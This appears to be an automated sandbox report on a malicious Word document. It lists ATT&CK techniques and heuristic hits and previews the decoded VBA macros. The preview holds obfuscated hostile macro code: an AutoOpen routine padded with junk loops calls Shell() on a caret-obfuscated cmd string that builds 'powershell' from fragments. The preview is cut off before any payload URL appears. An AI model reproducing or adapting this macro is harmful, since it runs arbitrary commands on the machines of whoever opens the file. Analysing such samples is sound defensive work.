MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1203 Exploitation for Client Execution
The sample contains a VBA macro with an AutoOpen function that calls the Shell() function. This indicates the macro is designed to execute arbitrary commands, likely to download and run a second-stage payload. The obfuscated nature of the script and lack of specific indicators prevent definitive family attribution.
Heuristics 6
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17233 bytes |
SHA-256: 73abcabb26f6f94ef5c71b1ece44aa7f9529de49d921f0c47399ae68b2b98cf2 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ZIkzCIzbvIrB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function wCGXOfaZ()
On Error Resume Next
For smvIH = jfwFj To 22016
PTUkOZ = (BfwVo - ChrW(62339 * 98767) * ilLQFZ * CInt(ijJlE + Sqr(56011)) + 27580 - 62129 / 74417 - CDate(YBrJjj - 95703 + 13128 - Hex(EMnaT / 52396)) + (zzLtS * Tan(VNpla)))
Next
For VlnzMY = iHaBB To 27301
AVorI = (KhdQVs - ChrW(57695 * 35448) * dTvJUk * CInt(QNbCD + Sqr(93494)) + 28307 - 47285 / 92676 - CDate(fJFAZ - 96085 + 55632 - Hex(TnIWiT / 88958)) + (wdGGst * Tan(hEbPG)))
Next
wCGXOfaZ = LKzJvaAPp + Shell(NZQjPnTULhw + Chr(uEUovOC + vbKeyC + pBNLkffJh) + zYYEQk + vCXvczL + YzuwE + mAVdVVBER + QFzDhCuw + PoIOpOQuc + QzAijBBFdM + pLLfET, fIDCWzhSq + 0 + vKPrlrPvp)
For NTFULN = MfEVS To 47075
zLuiI = (GzlRq - ChrW(32881 * 72497) * YwwhWw * CInt(UCBSF + Sqr(48979)) + 70703 - 37754 / 48162 - CDate(nTsbWJ - 84949 + 15228 - Hex(fPhniu / 53151)) + (oiFnvZ * Tan(cIsQCi)))
Next
End Function
Sub Autoopen()
On Error Resume Next
For iMjCz = JCmGaZ To 36419
mPXYip = (kTzruz - ChrW(98169 * 26815) * bFPJl * CInt(Gbzib + Sqr(72808)) + 92082 - 99003 / 26619 - CDate(HFpsV - 84723 + 46207 - Hex(ZttjKD / 91197)) + (oViUJ * Tan(EQIva)))
Next
wCGXOfaZ
For OKpTjV = rJVvjh To 41560
scXRun = (zaVtM - ChrW(96024 * 1977) * kZRcf * CInt(EZApQ + Sqr(6609)) + 1470 - 37181 / 50510 - CDate(moYMok - 59042 + 62296 - Hex(wNPwp / 17209)) + (qkkVSF * Tan(WoDXbi)))
Next
End Sub
Attribute VB_Name = "QizaGYZokzuk"
Function zYYEQk()
On Error Resume Next
For aBiQfa = inXRmO To 65171
hnDWr = (vHRcjH - ChrW(23487 * 85131) * mpjVn * CInt(lXjSD + Sqr(52121)) + 84891 - 77809 / 57086 - CDate(jrVQw - 24068 + 18530 - Hex(MfuMo / 98160)) + (jqakb * Tan(tulwP)))
Next
UIMJYjAHCm = "md AiLWE" + "RD jzokTpdCiKzL" + "VuZ" + "HiuLsouqiF UT" + "LVEuY & " + " %" + "^c^o^m^" + "S^p^E" + "^c^% %^c^"
For DoEDT = PzQqcQ To 49981
NIIfZj = (zXkRDC - ChrW(12995 * 76280) * jTjsFi * CInt(cbYZz + Sqr(6311)) + 80238 - 27271 / 18796 - CDate(uskmG - 43890 + 63056 - Hex(ERTlPl / 16423)) + (THIkh * Tan(iAfEAJ)))
Next
sjjwwpO = "o^m^S^p^E^c^%" + " " + " /V /" + "c " + " set %muEHA" + "LuIGS" + "UNkGI%=PWXsDv" + "CzBOmJ&&s" + "et %ucanQ"
For whWHtH = DKdzz To 16200
NpqLm = (ojiFZ - ChrW(55835 * 38739) * kGBWW * CInt(IjwiVd + Sqr(89673)) + 16301 - 16770 / 57062 - CDate(lZZUL - 79605 + 85676 - Hex(tvMwQ / 66450)) + (nDSEb * Tan(cItisM)))
Next
DSDbCfXni = "fOSfjsJ%=p&" + "&set %kKOL" + "WcPkFofQ" + "%=o^w&&s" + "et %iSptQwHfU" + "zi"
For IWfbEu = DuqYQJ To 15308
EvkjvF = (rpECjI - ChrW(31863 * 62031) * TcCFWQ * CInt(tVuMsM + Sqr(88123)) + 75584 - 35024 / 36893 - CDate(EztLRk - 35439 + 59184 - Hex(WCKfnO / 678)) + (oGCGn * Tan(rKBtz)))
Next
BRHINYcwMV = "iQki%=WVUw" + "MjwwjCV&&set %V" + "iOojztErwOk%" + "=!%" + "ucanQfOSfj"
For vRjQJM = wHLSms To 49827
qKOZi = (nzLQs - ChrW(31790 * 73369) * BPrUA * CInt(FSuWbf + Sqr(7333)) + 97313 - 53997 / 77942 - CDate(OOwAz - 73676 + 38717 - Hex(RHRYA / 33871)) + (wuFvaR * Tan(fIYQsz)))
Next
UjmszlUmd = "sJ%!&&se" + "t %rrGGm" + "YkZndawnwc%=P" + "nobTMabf" + "&&set %mZJLj" + "jE"
For IpXWAd = pCBdX To 3204
mnutEf = (JsjNzW - ChrW(66238 * 77467) * itWUJS * CInt(BzotHr + Sqr(8040)) + 35193 - 7420 / 31365 - CDate(tUdWo - 34516 + 31551 - Hex(wrJCGU / 2009)) + (SkAhZT * Tan(suQmaR)))
Next
EzcizMT = "FBat%=e^r&&" + "set %zQAdWG" + "NmzIWv%=!%kKOLW" + "cPkFofQ%!" + "&&set %IojnM"
For NJhNpT = MFEDKV To 6827
whZGRl = (DjkZbk - ChrW(54653 * 46213) * phIdzV * CInt(ihbGiw + Sqr(56397)) + 29438 - 96341 / 79904 - CDate(ziNUz - 5914 + 60724 - Hex(wdPrO / 68805)) + (ZOcNas * Tan(nuZqfD)))
Next
PrqcprmSi = "joSQCs%=s" + "&&set %" + "tqzCWqMObQ" + "oOtwJ%=L" + "uwvYhzkPjK" + "&&set %vjGi" + "zonu%=h"
For FUbmj = pRVhEz To 86763
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.